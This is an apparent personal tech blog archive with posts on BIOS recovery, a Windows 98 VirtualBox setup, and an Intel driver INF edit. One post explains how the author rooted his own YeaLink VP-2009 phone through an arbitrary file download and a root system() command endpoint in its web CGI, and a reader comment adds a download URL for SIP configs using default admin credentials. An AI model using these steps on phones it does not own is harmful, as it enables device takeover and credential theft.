Updates from January, 2019 Toggle Comment Threads | Keyboard Shortcuts

  • duncanbowring 10:58 on January 12, 2019 Permalink | Reply  

    Dell R210 II BIOS Update Bricked 

    Broke my old Dell R210 II doing a BIOS update. Managed to fix it by flashing the chip directly.

    In the case of the R210 II, I used:

    CH341A USB Programmer (https://www.amazon.com/gp/product/B01I1EU9LG)

    SOIC8 Chip Clip (https://www.amazon.com/gp/product/B00V9QNAC4)

    CH341A Programmer software (free)

    The toughest part was finding the 8MB flash binary within the Dell downloads.

    The flash image start header is: FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF5AA5F00F .. searching for that [using a hex editor] and then selecting 0x800000 (8MB) length (which is the end of file here). I dumped it to a new file, then flashed that new .bin to the BIOS. First I tried to use the OEM EXE, but it was a weird length. I ended up extracting the installer and using the file that was in the payload directory.

    Result! Back in business.

    Advertisements
     
  • duncanbowring 16:09 on April 22, 2016 Permalink | Reply
    Tags: ASCII, Diagrams, DITAA, Dokuwiki, Visio, Wiki   

    ASCII Flowcharts 

    You can generate this:

    Screen Shot 2016-04-22 at 11.59.58 PM

    From this:

    Screen Shot 2016-04-22 at 11.59.18 PM.png

    But create it visually, by using this (http://asciiflow.com):

    Screen Shot 2016-04-23 at 12.03.03 AM.png

    The Java based tool that generates the bitmap image from the ASCII graph is called DITAA (DIagrams Through Ascii Art) (http://ditaa.sourceforge.net/).

    I personally use the ditaa plugin for Dokuwiki this to embed flowchart diagrams into my Dokuwiki hosted documentation. Dokuwiki is a decently powerful wiki software similar to Mediawiki, etc. One major difference is that it uses flat files instead of an RDBMS. You can use either the flat file standard setup or the Git Backed plugin to have it as part of the SCM. Makes for much easier management and automatic documentation generation!

    Screen Shot 2016-04-23 at 12.07.01 AM.png

     

     
  • duncanbowring 01:21 on December 4, 2015 Permalink | Reply
    Tags: 98se, Gaming, oldskool, , virtualbox, win98   

    Windows 98SE on VirtualBox (with video and audio drivers) 

    Screen Shot 2015-12-04 at 1.00.52 AM

    Why do this?

    If you feel nostalgic for a bit of Windows 9x action, or you just want to play some old games that are between DOS and Windows XP, you can either build a retro PC gaming rig, or you can test the water with VirtualBox.

    Once it’s all done, you too can see how pointless it all is. 🙂

    What you will need:

    • Windows 98SE ISO (unfortunately, I can’t help you here)
    • SCITech Display Doctor (this will be the video driver) – https://docs.google.com/file/d/0BycgkMZbeQOzWXE5NUhnWGRycVE/edit?pli=1
    • VirtualBox (https://www.virtualbox.org/wiki/Downloads)
    • Optional downloads are available and listed in each section below.

    Create the VM and Install Windows 98 SE

    1. Create new VM on Virtualbox Screen Shot 2015-12-03 at 10.50.03 PM
      • Type: Microsoft Windows
      • Version: Windows 98
      • RAM: 64MB
      • Create new fixed size HDD – 2GB (VDI is fine)
    2. Install Windows 98SE
      1. Boot with your 98SE ISO mounted (you’ll have to find this yourself)
      2. Boot with option 2 – Start computer with CD-ROM support Screen Shot 2015-12-03 at 10.53.04 PM
      3. Run fdisk and accept all the defaults to create a 2GB partition on your virtual drive.
      4. Restart the virtual machine
      5. Boot with option 2 – Start computer with CD-ROM support
      6. Format the virtual drive using format on the Windows CD
        • D:\win98\format c:
      7. Run: D:\setup.exe /ie /im /is /nr
        • /ie Disables create a boot disk (causes crashing on VBox and 98SE installer)
        • /im Disables checking conventional RAM
        • /is Disables scandisk
        • /iv Don’t disable billboards
        • /nr Disable registry check
      8. Run through the Windows installer with all the defaults Screen Shot 2015-12-03 at 11.01.46 PM
      9. After reboot – Boot from Hard Disk
      10. Enter your name and the CD key for Win98SE (98 key works too btw); install will continue.
      11. If everything went well, you should see Windows 98 desktop and hear some tragic music. 🙂

    Install Video Driver

    1. Shutdown Windows (and the VM)
    2. Edit Settings of the VM -> Storage -> Add another device to the IDE controller (click the CD with the green plus) and mount the scitech-display-doctor-7.iso file you downloaded earlier. Screen Shot 2015-12-03 at 11.13.20 PM
    3. You should see a CD drive with Sdd7 – double click that then run the scitech-display-doctor-win-7.0 installer – Express installation is fine. Screen Shot 2015-12-03 at 11.14.52 PM
      • You will eventually need to register the software. Unfortunately, it’s not sold anymore, but it is trivial to find a serial number for this via your favorite search engine.
    4. OS will restart, when it returns, SciTech Display Doctor will load. Either register it or start the 21 day trial.
    5. On the HOME page, underneath Current Configuration, there is a section called Active Features. Click ‘Disabled’ next to SciTech Display Driver then select SciTech Nucleus Driver and apply. Screen Shot 2015-12-03 at 11.19.00 PM
    6. OS will reboot again (remember how annoying this used to be?)
    7. SciTech reloads and you’ll see that VESA VBE 2.0 Oracle VM VirtualBox VBE Adapter is now selected. Screen Shot 2015-12-03 at 11.25.29 PM
    8. Minimize the window, right click Desktop then Properties then Settings
      • Here you should see Default Monitor on SciTech Display Doctor 7.0
    9. Change Colors to 16bit, apply, it’ll reboot again!
      • I’ve had issues trying to change resolution at the same time.
      • I’ve also had issues when the restart didn’t work – if so, restart the VM yourself – no need to go into safe mode, it should boot the second time OK.
    10. Right click Desktop -> Properties -> Settings; now you can select 1024×768 no problem.
    11. Hello accelerated Windows desktop!

    Configure for (broken and basic) Internet access (NAT)

    This will allow you to access the Internet, albeit in a basic and broken way.

    1. Start -> Settings -> Control Panel -> Internet Options -> Connections -> Setup
      1. I want to set up my Internet connection manually … or local area network (LAN).
      2. I connect through a local area network (LAN).
      3. Accept everything except for setting up a mail account.
      4. Internet Explorer 5 will load. I recommend that you download Opera 9.64 (Opera 10 and above doesn’t support Windows 9x) – http://www.oldversion.com/windows/opera-9-64
      5. Firefox 2 also works, but I found it was about as useful as IE5.
      6. Windows Update is long dead.

    Install DirectX8.1b (optional step)

    1. If you installed Opera 9.6 earlier, this is compatible enough to grab the file directly from the web via http://www.falconfly.de/directx.htm
    2. You will also need WinZip – grab this from http://www.bestweb.net/assistance/win95/winzip/
    3. Extract and install (via dxsetup.exe) the DirectX8.1b redistributable.
    4. Windows will reboot and you will now have DirectX 8.1 installed – you can verify this by running C:\windows\system\dxdiag.exeScreen Shot 2015-12-04 at 12.19.34 AM

    Install AC97 soundcard (optional step)

    The default VM setting is SoundBlaster 16 compatible. You can use the Windows Midi Synth, but I’ve seen some issues with games. In turn, we can use 9x drivers for AC97.

    1. If you installed opera 9.6, head over to http://www.realtek.com.tw -> Downloads -> AC’97 Audio Codecs (Software) -> Windows 95 for Driver only.
    2. Install file then instead of rebooting Windows, choose reboot later then shut down the VM.
    3. Head into Virtualbox VM settings -> Audiot and change the Audio Controller from Soundblaster 16 to ICH AC97
    4. Boot the VM up, it’ll detect the AC’97 audio – install the driver then reboot againScreen Shot 2015-12-04 at 12.28.45 AM
    5. Should have audio and wavetable MIDI when it returns.
    6. You can test this by running C:\windows\system\dxdiag.exe again.

    Screen Shot 2015-12-04 at 12.45.49 AM

    Testing a Game

    C&C Gold 95 doesn’t seem to work – will investigate further without dx8.1 since it comes with dx3.

     

    Civilization 2 Ultimate Collection – works perfect (dx5 game)

     
    • saxbophone 09:57 on April 19, 2017 Permalink | Reply

      Thanks for this, I’m sure I’ll find it very helpful when I have a crack at installing win98 in a VM soon. I assume this will work just fine with a real installation CD too? From what I have gathered, VirtualBox supports booting directly from a real CD as well..?

    • saxbophone 15:16 on April 20, 2017 Permalink | Reply

      Thanks, this guide was very helpful, all working. Now to begin retro computing adventures! 😀

    • James 16:05 on April 30, 2017 Permalink | Reply

      everytime I try installing SciTech after selecting the Scitech driver and restart I get a Windows Protection Error. You need to restart your computer. and no matter what I do I can’t get into windows except safe mode, but when I go into that I can’t do anything with SciTech. It just says I need to restart. I’ve tried this several times on fresh installs and it always comes back with this error. I have also seen BSOD after installing it.
      Any thoughts?

      Thanks!

    • Zack 13:13 on May 1, 2017 Permalink | Reply

      After enabling the SciTech Display Driver, when I try to reboot it stops on a black screen with the message, “Windows protection error. You need to restart your computer.” Any ideas? I’ve tried restarting the machine several times and can’t get past that error. It appears right after the Windows 98 boot screen.

      • Zack 13:26 on May 1, 2017 Permalink | Reply

        Well, I figured it out. I disable PAE and VT-x, which fixed the problem

    • max 12:08 on May 19, 2017 Permalink | Reply

      Does this works with Win95? I’m trying everything to make it work on it and everytime i finish with a bsod and a whole crash of virtualbox while it works fine on a win98…

    • Brandon 15:18 on September 17, 2017 Permalink | Reply

      Hello, I am having trouble with an issue after installing sdd. After I attempt to activate the nucleus driver, windows boots into a DOS style screen that simply says “Windows protection error. You must restart your computer.” I was hoping that you may know why this is happening.

    • AnonymousShithole 08:47 on November 13, 2017 Permalink | Reply

      Doesnt work on Virtualbox ver. 5.1.22 r11512, Windows Protection Error — Restart your computer, happened after i enabled the Nautilus drivers and restarted, safe mode works, so its probably the driver.

    • Yep 11:09 on December 11, 2017 Permalink | Reply

      Thank you! it works!

    • Jim 15:51 on January 11, 2018 Permalink | Reply

      Just wanted to say thanks for this, you were a huge help. Been wanting to set up a virtual machine to play a bunch of old 90’s PC games for a while now but I just needed a tutorial like this to get it right and now I’m running them like a dream.

    • Sean Gibbons 22:04 on August 4, 2018 Permalink | Reply

      Thank you for the wonderful guide.
      The only section I can’t get to work is for the AC97 Soundcard. The Windows 95 Driver file from Realtek gives a “For 95 Only” Error. I tried installing the Windows 98 version, but doesn’t seem to work.
      I’ll stick to the SoundBlaster for now, but my system now works aside from that.

    • Horst 16:09 on August 26, 2018 Permalink | Reply

      Hello nice and very useful article! I tried it and everything worked so far except the audio driver. When I try to install the realtek Driver “Windows 95 for Driver only” as you wrote in the article, the installing assistent tells me that this version is only compatible with Win 95.. I tried the other realtek driver for Win 98 but it did not work. Do you know a solution for that or how to make the Win 95 Driver work?

    • Fuck off 13:14 on November 3, 2018 Permalink | Reply

      Hey idiot, thanks for wasting my valuable time with a set of instructions that doesn’t work!!!!

      All I get when trying to install Windows 98 are Rundll32 illegal operation errors!!!!!

      I am so sick and tired of dipshits like you clogging up the internet with misinformation that makes it harder to actually find valuable information. Next time, just don’t! Leave it to the professionals that actually know what they’re doing to post things like this.

      • duncanbowring 20:55 on January 31, 2019 Permalink | Reply

        It was posted 3 years ago. I haven’t done it since.. you can see the screenshots. If you have a specific problem, post for other people how to fix it.

    • Marshall Hoff 11:30 on November 7, 2018 Permalink | Reply

      Winworldpc is a great place to download windows iso’s and other old software: https://winworldpc.com/product/windows-98/98-second-edition

      • duncanbowring 20:54 on January 31, 2019 Permalink | Reply

        I recommend using a sandbox hitting the site.. my web filter says:

        Host: winworldpc.com

        URL: http://winworldpc.com/

        Reason: Compromised – Web pages that have been compromised by someone other than the site owner, which appear to be legitimate, but house malicious code.

    • Adam 17:16 on December 27, 2018 Permalink | Reply

      i gotta problem when im download the opera or other programs at oldversion.com , it showed as .php please i need some help.

      • duncanbowring 03:48 on December 28, 2018 Permalink | Reply

        I haven’t done this for a very long time because I use an old p4 gaming laptop for ~XP.

        Pi3 dosbox works well up and beyond the early to mid 90s

      • Sad old git 17:17 on January 4, 2019 Permalink | Reply

        Try downloading it with a modern pc then put it into an iso (or burn it to a physical dvd) and install in the VM that way.

      • Sad old git 05:10 on January 5, 2019 Permalink | Reply

        Actually just tried the d/l myself and although IE calls it a PHP file it’s actually an exemplary so just rename it to .exe and it will be ok.

        My problem is that any download I do with Opera is reported a corrupted when I try to open it!

    • Sad old git 16:56 on January 4, 2019 Permalink | Reply

      Had a fun afternoon installing 98, got the video driver working, seem to have lost ACPI in the process but no matter. Followed with a happy evening reminding myself of the joy of using 98 after 3.11 and 95. Got Borland Pascal for Windows working, made it say “Hello World”.

      Finally remembered how nice it was when XP came along and then went to bed wondering why I’d bothered :-}

    • Sad old git 17:09 on January 4, 2019 Permalink | Reply

      Oh, and regarding updates,

      This is a posted iso of an official MS security update rollout containing everything up to 2004:

      https://www.dropbox.com/s/lzdxagq4ag0r6yc/SUCD.ZIP?dl=0

      And this is an unofficial update package:

      http://m.majorgeeks.com/files/details/unofficial_windows98_se_service_pack.html

      • Sad old git 17:11 on January 4, 2019 Permalink | Reply

        Should mention that I have not yet tried either of those update packages. Use at your own risk (but hey, it a VM so worst case gonbak a snapshot).

        • Sad old git 07:40 on January 6, 2019 Permalink

          Have now tried both these update packages. The “Unofficial” one is a bit complicated and full of scary warnings. I did install let it install the main “core” updates but wimped out on all its other options. The less nervous (or more foolhardy) may do better. I may try further options later and see what happens.

          The official MS update pack does indeed seem to be what it says it is and quickly and easily (well, after a typical number of reboots at least) install a bunch of security updates, installed IE 6 and Direct x 9.0b and Windows Media Player 9.

          So there you are, your choice which if either you try but the official one seems good.

  • duncanbowring 17:39 on January 17, 2013 Permalink | Reply
    Tags: 82579V, Asus Rampage, Intel 82579V 2008 R2, Rampage IV Extreme, Windows server on X79   

    How To: Intel 82579V Gigabit Network Connection – Windows Server 2008 R2 

    Clearly Intel doesn’t want us to install server OS onto desktop motherboards nowadays.

    Look at your driver CD. Navigate to the PRO1000 folder; depending on whether you have 32bit or 64bit OS, you will then want either Win32 or Winx64 (not Win64 which is for Itanium).
    The choice for the next folder will depend on your OS; NDIS5x is Server2003 or XP, NDIS61 is Server2008 or Vista, NDIS62 is Server2008R2 or 7, I presume NDIS63 is for Windows 8, Server 2012.

    Copy the correct folder to your desktop.

    In either case once you have chosen the correct folder you need to find the .inf starting e1c ; so for Server 2008 R2 64bit it will be called e1c62x64.inf. Ensure you are doing this on the copy that now exists on your desktop.

    Open the file in notepad;

    ;******************************************************************************
    ; e1c62x64.INF (Intel 64-bit extension Platform Only,
    ; Windows 7 64-bit extension and Windows Server 2008 R2 64-bit extension)
    ;
    ; Intel(R) Gigabit Network connections
    ;******************************************************************************
    ;
    [Version]
    Signature = "$Windows NT$"
    Class = Net
    ClassGUID = {4d36e972-e325-11ce-bfc1-08002be10318}
    Provider = %Intel%
    CatalogFile = e1c62x64.cat
    DriverVer = 06/21/2012,11.16.96.0
    [Manufacturer]
    %Intel% = Intel, NTamd64.6.1, NTamd64.6.1.1, NTamd64.6.2
    [ControlFlags]
    ExcludeFromSelect = \ 
     PCI\VEN_8086&DEV_1502,\ 
     PCI\VEN_8086&DEV_1503
    [Intel]
    [Intel.NTamd64.6.1.1]
    ; DisplayName Section DeviceID
    ; ----------- ------- --------
    %E1502NC.DeviceDesc% = E1502.6.1.1, PCI\VEN_8086&DEV_1502
    %E1502NC.DeviceDesc% = E1502.6.1.1, PCI\VEN_8086&DEV_1502&SUBSYS_00011179
    %E1502NC.DeviceDesc% = E1502.6.1.1, PCI\VEN_8086&DEV_1502&SUBSYS_00021179
    %E1502NC.DeviceDesc% = E1502.6.1.1, PCI\VEN_8086&DEV_1502&SUBSYS_80001025
    %E1503NC.DeviceDesc% = E1503.6.1.1, PCI\VEN_8086&DEV_1503
    %E1503NC.DeviceDesc% = E1503.6.1.1, PCI\VEN_8086&DEV_1503&SUBSYS_00011179
    %E1503NC.DeviceDesc% = E1503.6.1.1, PCI\VEN_8086&DEV_1503&SUBSYS_00021179
    %E1503NC.DeviceDesc% = E1503.6.1.1, PCI\VEN_8086&DEV_1503&SUBSYS_80001025
    %E1503NC.DeviceDesc% = E1503.6.1.1, PCI\VEN_8086&DEV_1503&SUBSYS_04911025
    [Intel.NTamd64.6.1]
    ; DisplayName Section DeviceID
    ; ----------- ------- --------
    %E1502NC.DeviceDesc% = E1502, PCI\VEN_8086&DEV_1502
    %E1502NC.DeviceDesc% = E1502, PCI\VEN_8086&DEV_1502&SUBSYS_00011179
    %E1502NC.DeviceDesc% = E1502, PCI\VEN_8086&DEV_1502&SUBSYS_00021179
    %E1502NC.DeviceDesc% = E1502, PCI\VEN_8086&DEV_1502&SUBSYS_80001025
    %E1503NC.DeviceDesc% = E1503.6.1.1, PCI\VEN_8086&DEV_1503
    %E1503NC.DeviceDesc% = E1503.6.1.1, PCI\VEN_8086&DEV_1503&SUBSYS_00011179
    %E1503NC.DeviceDesc% = E1503.6.1.1, PCI\VEN_8086&DEV_1503&SUBSYS_00021179
    %E1503NC.DeviceDesc% = E1503.6.1.1, PCI\VEN_8086&DEV_1503&SUBSYS_80001025
    %E1503NC.DeviceDesc% = E1503.6.1.1, PCI\VEN_8086&DEV_1503&SUBSYS_04911025

    Open the file in notepad;

    If you look in [ControlFlags], you see that there are two device IDs listed. DEV_1502 and DEV_1503.
    If you go back to the new computer you built (with no NIC driver installed 🙂 ), in Device Manager, you should see “Ethernet Adapter” listed as an unknown device. Go into the Properties of that, then Details, Hardware Ids. Now, you see that the device should be DEV_1503. Great.

    Go back to the notepad file you have open, you can see that under the second section within [Intel] you don’t have anything listed for DEV_1503 under [Intel.NTamd64.61]. Ironically, every other section has Server 2008 R2 provided for. Sneaky Intel, sneaky.

    Anyway, copy and paste the two lines that provide for DEV_1503 in the [Intel.NTamd64.6.1.1] section to the new section, like above. Save the file.

    Go back to the other computer that still has device manager open (it might be the same computer..), click Driver -> Update Driver, then manually select the desktop location of your NDIS62 directory you copied and then edited.

    Driver should install successfully. Hit me up if your mileage varies.

     
  • duncanbowring 17:26 on January 8, 2013 Permalink | Reply
    Tags: Dell, Dell M610, Maxing out., Nehalem   

    Time to retire the Dell M610 blade? What’s next? 

    Westmere X5762 vs Nehalem X5570

    After analysis of Westmere vs Nehalem;

    The gains aren’t small, but neither are they substantial enough to motivate upgrading from Nehalem to Westmere – only in select cases will the gains be in the 40-50% range. Similarly, the power efficiency improvements are nice, but not profound compared to the prior generation.

    The clock-rate increase for the 95W TDP chips (including turbo boost) that can be used in the M610 is 3.2GHz to 3.6GHz (I lock my chips to 3.2GHz permanently by disabling all power management in the BIOS and I also disable hyperthreading. YMMV). You’re looking at a mathematical difference of 11%. The extra cost vs the gains support the original conclusion that the gains are not substantial enough to motivate the upgrade.

    The Nehalem architecture was kick-ass, and remembering back to my benchmarks in 2008/2009, I saw a thread for thread 30% increase in capability.

    If you’re looking at a multi-threaded application, you could see 20-40% increase in performance with the extra 2 cores. Perhaps virtualization would see the most benefit here. However, when you look at the price tag that STILL exists against the X5672 chips, it really looks less appealing than it could, if you were looking for a quick interim upgrade without replacing all your systems.

    Again, your mileage may vary. For me, this isn’t a large enough gain to even warrant picking up a couple of chips to test them.

    The Nehalem X5570

    Interestingly,  from performance tuning my BIOS, my benchmark of the CPU resulted in interesting results compared to the one on CPU Benchmark’s website:

    My result was an aggregate score of: 10,232 for CPU Benchmark.
    The 2 results recorded on CPU Benchmark’s website: 6,025.

    I cannot delve deeper into the tests submitted to the website, but I can only assume that something was wrong with their setup.
    If I look at the Single Thread results for my CPU, it is completely (expectantly) destroyed by the Intel Ivy Bridge i7-3770k @ 3.5GHz. 70.1% faster. This is pretty impressive, and I think it warrants a further look into the modern CPUs and building a prototype system for further testing.

    Faster, Faster, Faster

    My initial research is showing that the best thread-for-thread CPU for applications that aren’t so multi-threaded seems to be the Intel® Xeon® Processor E3-1290V2 (8M Cache, 3.70 GHz) with turbo boost of 4.10GHz. It’s a 4 core chip with 8 threads (HT) on the 22nm lithography and only 87W TDP (wow!). Unfortunately, it looks like it will not accept a multi-CPU configuration system.  This might not be a problem for me.

    Since I’m in the mix, I’m also looking at the Core i7-3770K 3.5GHz (3.9GHz turbo) chip. I bet this will run stable at 4.10GHz without much trouble. I understand it’s a desktop CPU, but the price alone make it worth a second look – especially if I’m thinking about self building. Clock for clock, thread for thread, this looks like a great chip. It holds its own against the E3-1290V2 at a fraction of the price. I have a 2600k at home stable for over a year at 4.5GHz.

    A side by side of these two chips. They’re pretty similar.

    Intel Core i7-3770K Intel Xeon E3-1290 v2
    Intel Core i7-3770K Picture
    is not
    available
    Specifications differences
    Market segment Desktop Server
    Manufacturer Intel
    Family Intel Core i7 Intel Xeon
    Model number i7-3770K E3-1290 v2
    CPU part number CM8063701211700 CM8063701099101
    Box part number BX80637I73770K
    BXC80637I73770K
    Core name Ivy Bridge Ivy Bridge-H2
    Platform name Carlow
    Microarchitecture Ivy Bridge
    Technology (micron) 0.022
    Socket Socket 1155
    Frequency (MHz) 3500 3700
    Turbo Frequency (MHz) 3900 / 3900 / 3800 / 3700 4100 / 4000 / 3900 / 3800
    Clock Multiplier 35 37
    L1 cache 128 KB (code) / 128 KB (data)
    L2 cache (KB) 1024
    L3 cache (KB) 8192
    TDP (Watt) 77 87
    Cores 4
    Multiprocessing 1
     
  • duncanbowring 03:57 on April 23, 2012 Permalink | Reply
    Tags: Rooted, VOIP, VP-2009, YeaLink   

    YeaLink VP-2009 VOIP/Video Phone – r00ted, here’s how.. 

    Awesome phone. Not so awesome code. It took me the best part of 6 hours, but I rooted the bitch. Guide to come!

    Now, I just need to see what security risk this poses to me since I now use these phones professionally. Be careful if you use these in your office! At least it’s not so easy to change the actual phone software. It’s a compiled ARM binary. Pity, would have been nice to write custom modules for it. I think it uses some strange XML interface to display content, might be a way to make that display web content of your own choice.

    Image

    Rough guide:

    view-source:192.168.1.114/cgi-bin/cgiServer.exx?

    <html>
    <head>
    <title>syntax error</title>
    </head>
    <body>
    Unkonw GET type : useage ?[page/download/command]=xxx
    <br>
    </body>
    </html>

    Oh look, I can download any file from the phone.

    Hmm.. command? What is command? Well, we can grab the syslog and see what goes on in there..

    Mar 29 10:42:47 mini_httpd[772]: mini_httpd.c(1466):path:/cgi-bin/cgiServer.exx,query:command=msgSendMessage(%22app_vpPhone%22,%220xa8004%22,%220%22,%220%22)

    Interesting! Alright, so I dig through their web code and I find:

     function _SendMessage(thread, uMsg, wParam, lParam)

    {

    return “msgSendMessage(\”” + thread + “\”,\”” + uMsg + “\”,\”” + wParam +”\”,\”” + lParam + “\”)”;

    }

    I test that via URL, and it works. I think. No errors.

    What else do I see here..

    function _getFreeSpace(strpath)
    {
            return "getFreeSpace(\"" + strpath + "\")";
    }

    Aha, this works too. With any path, via URL.

    However, here’s the money shot right here.. interesting command:

    function _system(cmd)
    {
            return "system(\"" + cmd + "\")";
    }

    I see they make calls to it internally:

    function doReboot()
    {
    //var formInput = document.formInput;
    if(xmlHttpGet(_SendMessage(“app_vpPhone”, “0xa8004”, 0, 0)) == “1”)
    {
    alert(“Talking, Please save config later.”);
    return;
    }
    if(confirm(” Do you want to reboot device?”))
    {
    jsShowPageStatus(“main-content”,”Rebooting , please wait …”, “server-status”);
    xmlHttpPostAsyn(_system(“reboot >/dev/null 2>&1”), responseXmlHttp);
    return;
    }
    }

    So, let’s try reboot.. I execute the reboot command via the browser. Boom, it reboots.

    After hours of screwing around and banging out recursive ls, df, contents of files, touching new files.. I figure out that they obfuscate user permissions for /etc/

    Extract:

    1 -rwxr-xr-x    1 1011     1002          601 May 13  2011 passwd

    0 -rwxr-xr-x    1 1011     1002           31 May 13  2011 issue.net

    0 -rwxr-xr-x    1 1011     1002          452 May 13  2011 nsswitch.conf

    0 -rwxr-xr-x    1 1011     1002          421 May 13  2011 inputrc

    2 drwxr-xr-x    1 1011     1002         2048 May 13  2011 dhcpc

    0 -rwxr-xr-x    1 1011     1002           26 May 13  2011 host.conf

    3 -rwxr-xr-x    1 1011     1002         2921 May 13  2011 inetd.conf

    Still doesn’t explain why I cannot rm files I’ve created in /tmp or append with echo. I can only create with echo or touch!

    Numerous attempts to add a user doesn’t work. The commands just don’t exist.
    I look at the files I create with touch and oh dear oh dear, they’re created by root. No chroot ! Or even running as an unprivileged user!

    I chown passwd to root:root and then I run passwd –d to remove password. I overwrite MOTD prior to this as a test, hence the ‘test’.

    BAM, I’m in.

    Footnote: Now I’ve firewalled this interface off from the rest of the users on my network. Don’t want anyone snooping in on private phone stuff!

     
    • gerod006 14:03 on June 19, 2012 Permalink | Reply

      How can i download files in tmp ????

      • duncanbowring 17:58 on June 19, 2012 Permalink | Reply

        Same method, just include the path in your download URL. /tmp/file. You have to make sure it’s readable, so use ls to check the perms. Interestingly, everything the webserver does is as root, so you can do anything.

    • gerod006 20:36 on June 19, 2012 Permalink | Reply

      are there some way to download all tmp folder, I dont know each file??? I want the an xml file… Thnks

      • duncanbowring 20:47 on June 19, 2012 Permalink | Reply

        You’d have to write a script to do it. Look at my instruction on command execution, you can run ls to get a directory listing. From there you can tell what you need.

        If you are handy with scripting you could automate the process.

        However, if you remove the root password, you can ssh in and then use scp to grab what you need from there like standard Linux.

    • gerod006 20:51 on June 19, 2012 Permalink | Reply

      ok i will try it
      Thnks

    • gerod006 08:38 on June 21, 2012 Permalink | Reply

      Hi, i downloaded files that i need, i found the path: http://admin:admin@192.168.5.124/cgi-bin/cgiServer.exx?download=/config/user/voip/sipAccount0.cfg and other files, i couldn’t execut script, I dont know how execute it, ¿ http://admin:admin@192.168.5.124/cgi-bin/cgiServer.exx?comand=script ? is it ok.??
      I need modify the files and upload. or replace them.
      Thnks.

      • duncanbowring 08:42 on June 21, 2012 Permalink | Reply

        It might be easier to wipe out the root password and do it all via putty/ssh.

        What are you trying to modify?

        • gerod006 08:55 on June 21, 2012 Permalink

          i will register a line automatically, with a aplication i will generate the file .cfg and replace it, i did it whit other phones, but with them i can use telnet.
          I didnt like modify other things in the phone..

        • duncanbowring 16:47 on June 21, 2012 Permalink

          Of course, that’s a good idea. You could wipe out root then add a new user to remotely administrate them via ssh. Central configuration would make a great addition to this tutorial. 🙂

        • duncanbowring 18:19 on July 22, 2012 Permalink

          hey how did you get on with things?

    • gerod006 07:25 on July 23, 2012 Permalink | Reply

      I did it with auto-provisioning, i created configuration file, in tftpboot folder (Linux).
      <>
      And when reboot the Yealink, it reads the file.

    • Sam 09:49 on November 6, 2012 Permalink | Reply

      Hello there,
      I am far from a programer, but like to try-
      I was wondering if its running linux would it allow you to configure the phone to hit a relay on an action?

c
Compose new post
j
Next post/Next comment
k
Previous post/Previous comment
r
Reply
e
Edit
o
Show/Hide comments
t
Go to top
l
Go to login
h
Show/Hide help
shift + esc
Cancel
%d bloggers like this: